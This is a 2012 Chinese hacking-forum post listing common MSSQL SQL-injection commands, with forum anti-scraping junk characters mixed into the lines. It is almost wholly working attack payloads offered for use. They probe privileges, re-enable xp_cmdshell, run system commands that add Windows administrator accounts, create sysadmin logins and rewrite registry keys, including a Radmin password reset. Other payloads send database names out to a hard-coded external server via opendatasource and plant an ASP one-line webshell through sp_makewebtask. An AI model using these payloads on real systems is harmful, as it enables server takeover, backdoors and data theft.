找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2109|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的+ e# L9 c7 ~9 W" h5 d$ I
and 1=(Select IS_MEMBER('db_owner'))
. U( u/ ]* S' {4 q& C2 ^And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
, j; T$ I- a0 Y9 z/ y* C: x! _6 R- W- b2 N) F1 X& S
//检测是否有读取某数据库的权限
) S8 K1 p# x; ]* Iand 1= (Select HAS_DBACCESS('master'))9 t* ~$ A5 J7 S
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
. n: c3 T/ E0 j& y* M$ K& U1 N. F, m2 }9 f- ?8 J

& E0 m! g9 U- G数字类型% u/ N, S7 w" j$ I# e/ ~! e
and char(124)%2Buser%2Bchar(124)=0
' H8 A8 H6 v, }. r/ t6 _; W3 F! z! h& @9 E/ ], J
字符类型) s2 x0 {  h4 k
' and char(124)%2Buser%2Bchar(124)=0 and ''='
; V5 J  H  S4 e5 ?# t* h
. y7 \* r# Q4 x5 K3 w  {$ h搜索类型8 Q9 D* J7 X: i$ c
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
) f! Z  n& W# K, a8 d- b) i' X, f$ {& \; C5 V2 z
爆用户名
! {9 }6 ~  W* E% W; b9 A9 rand user>0
! ^2 Y' \8 i; R; [' and user>0 and ''='
  X* [# J1 M" Q  d" @3 p$ u
8 r+ n( H+ Q7 O2 ?, h3 H检测是否为SA权限
% n2 E) y! a" N* v; W9 w* {and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
% N- }1 X: K9 N. k8 @' M- P- cAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --$ f5 ]" b0 O$ U7 f4 X. p8 V
' T6 F: H" S* m3 z' z- [
检测是不是MSSQL数据库
$ Q( Y9 A0 ?' H: M: xand exists (select * from sysobjects);--
! T! R1 b+ a1 l9 O0 ^% }$ ~& D
% a4 C6 g1 I8 R6 U2 F7 F检测是否支持多行
! ^! H! ]# S/ k# g;declare @d int;--6 g: k) \  N9 N
* A0 J0 }# r8 V5 F- L9 Q
恢复 xp_cmdshell
$ }; g5 j/ `' `1 A. j! b;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
( m+ l' ]7 L7 j" s. t
+ W0 g5 H+ q: R& L7 j/ w3 j
, K8 B% z: b* ?$ D9 xselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
  V5 f3 v2 X( A, W! `
" }9 E3 b  Q9 N7 \- x" W//-----------------------# U: b$ n) n% g  q5 O4 U
//       执行命令
* l% p; j; _1 a( y7 c6 {7 P//-----------------------7 p% j( m3 q# k5 z# \( q
首先开启沙盘模式:- V# c7 n+ p# g8 \  r6 T$ Q
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! a" ~- x$ k1 t
( c! c! w6 m! Y! {* u  B6 I+ ?然后利用jet.oledb执行系统命令0 x" s3 p' O. ~( f- v
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'), f% E' w- w. |- h; m6 c+ c

1 h9 i! Z% {# A& e+ Y执行命令
" M9 Y7 M* A" k6 a) D) e3 f) m;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--: A' \4 U* R/ M  ^* o

. {8 I" R" U) S% z* p2 _EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
8 [8 ~0 z0 ]4 D  G8 ], b  s% a( i, g3 L2 W
判断xp_cmdshell扩展存储过程是否存在:1 p! i6 K+ y, y# y# Y$ h
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
& @4 F# T& s- f# B/ I
  R& W' O+ v; |写注册表  c# f$ D8 W6 P" P
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1% @- C1 a( j& z  ~( a+ R3 I
" l" v4 d) B) H7 B' W* V
REG_SZ
' Y) ?, \8 {; T% P3 t' [) U) \8 W5 |
6 q7 Q) n) J* c读注册表
7 f% V: g; V: s1 t) ?exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit', ~6 Y. ?: a3 ~  j! F
2 Z& J9 n+ ?( v
读取目录内容* U3 ?' l1 B# R; R7 r, N
exec master..xp_dirtree 'c:\winnt\system32\',1,1
2 n* o+ Y. k. s2 \! |6 A$ M+ `0 S
% c5 L' k' p. }0 d/ E7 R6 A& \  [4 h- |5 m$ D- N( k8 q
数据库备份, C" `+ X; U: A+ ]* N1 l  u$ L
backup database pubs to disk = 'c:\123.bak'
! C9 A6 |5 K! K
, ?2 u5 }7 V) h/ T+ N//爆出长度
  D* a; x! _. L7 f5 SAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--& Q% ^6 a& g! J5 n

1 G, y9 w' ]; b$ ^# `2 y' a7 R* [, i& b0 K: I
, x: U4 d. q5 H8 P+ m3 H2 L
更改sa口令方法:用sql综合利用工具连接后,执行命令:
- ?+ F+ `( |% F/ }exec sp_password NULL,'新密码','sa'
* y0 B# g: e' N( W9 d- z( R
0 {7 p( k3 L& a% i3 _7 U& h0 f添加和删除一个SA权限的用户test:
5 J6 Q* y0 S) y6 v# r# y# Wexec master.dbo.sp_addlogin test,9530772
3 R7 b( l: h2 _8 }- ?' S: Dexec master.dbo.sp_addsrvrolemember test,sysadmin
( w& i/ K8 w1 ?' `( ?( {6 f# g# ?! ~- O+ f2 ]' t
删除扩展存储过过程xp_cmdshell的语句:
: |' H9 g& E6 Q9 S3 Vexec sp_dropextendedproc 'xp_cmdshell'
) B1 a, n. a. Q. P: _1 V6 f- W+ x: g! f( A- ?# w! g2 ~) c
添加扩展存储过过程
$ h/ q4 c1 l) \) L' F/ @EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'* K* O, J( D8 K- T% [
GRANT exec On xp_proxiedadata TO public
6 |7 r( l( R' H5 q5 ^$ h8 u- a9 z4 z3 n' T6 h1 L7 t! S

3 s+ i0 |8 F) M停掉或激活某个服务。
, g* F0 H9 G  V# T+ P" \# L' F0 z1 ]# N
exec master..xp_servicecontrol 'stop','schedule'
2 J6 f" p+ T. K* |8 _8 s  iexec master..xp_servicecontrol 'start','schedule'5 K: `+ w6 \) r* s& j

# E8 E& O# P1 u% }5 x! Bdbo.xp_subdirs
: i# i6 p0 X4 ~) \& T/ o' Q: F
' G2 b9 q# U. b5 f; C7 B( G0 z只列某个目录下的子目录。
' x8 {  r. [# Oxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
+ N% I7 B# z7 I4 ^* U  E+ I' O( a$ G* N8 X& }. K
dbo.xp_makecab8 p  o+ H2 c$ @: V8 h6 }

8 y1 G' u0 g: ^! ]$ y将目标多个档案压缩到某个目标档案之内。+ W  B; M/ C3 P) B( R8 v
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
# r, v6 U% {9 p& k: I# j! g# F0 X' y
; n* J- |. U  I& C7 Xdbo.xp_makecab8 h+ a& z" p, W. f' r
'c:\test.cab','mszip',1,, p# X- w7 H8 x: `: y# M
'C:\Inetpub\wwwroot\SQLInject\login.asp',2 b" K, L5 ^9 ~
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'9 N# \) g+ e% h7 d4 r6 t1 w1 Z# R

, L! t3 s: N+ k1 a9 _8 bxp_terminate_process
5 W3 V% F: V1 k1 k/ v9 q$ C
) [' h# W/ G* o; U2 ]& m  m停掉某个执行中的程序,但赋予的参数是 Process ID。
3 z. u6 t. _) r7 f利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
# V1 W. q. E4 x) h. W' ~- [' Q* _0 p9 Y
xp_terminate_process 24847 E9 r  b: E7 `2 `) Z: q

8 y4 J' m/ v, f6 e9 dxp_unpackcab
# T7 {4 E% l* x! R% t6 R- s/ V3 p9 N. F
解开压缩档。0 _+ F9 l- H7 f) G# X. T. d) e' Y% Z
6 Z7 F7 F  Z: ^% @4 [& E
xp_unpackcab 'c:\test.cab','c:\temp',1- [8 ~. q: u" D; m% O

" z) o' j! s8 Y4 j7 z. F, f5 M1 h0 w7 K+ n6 V, D, X$ g
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
- H) [# j/ L, Q% w: a5 N
# R+ z. _5 O' x- W' F# i$ ^+ Ycreate database lcx;% ?' F3 K- P, R
Create TABLE ku(name nvarchar(256) null);
3 ^0 c$ ^1 W& b$ \Create TABLE biao(id int NULL,name nvarchar(256) null);; h- J( i- g* @& K# u) E
4 n; X. ~6 G. e$ ]. U
//得到数据库名
$ ^8 d0 u! r2 Z4 B+ Minsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases' C" Q. F4 }+ W- U" I! E! t" ?

' n" ]1 h8 `, d+ p' F! B
4 d. N( X% O# t* S( @7 ~9 v//在Master中创建表,看看权限怎样$ ~% ]0 N/ w0 i. k1 F. F6 B
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
  u% m$ ?% x& d% H* v1 D
7 Q$ A0 |3 z0 ^" e. D用 sp_makewebtask直接在web目录里写入一句话马:  i$ d5 G/ ^$ Y8 q- u, T$ a2 C
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--! [* b$ [$ c# [- X

6 m: t* |/ U2 Q9 @* c. ^6 d//更新表内容
0 z% Z9 R! R2 S5 w7 H# XUpdate films SET kind = 'Dramatic' Where id = 1238 t8 R  g& d- w" Y: _: l
' J  `( F9 n  X3 R3 h
//删除内容
1 l, M8 }( n2 g) Z% Odelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表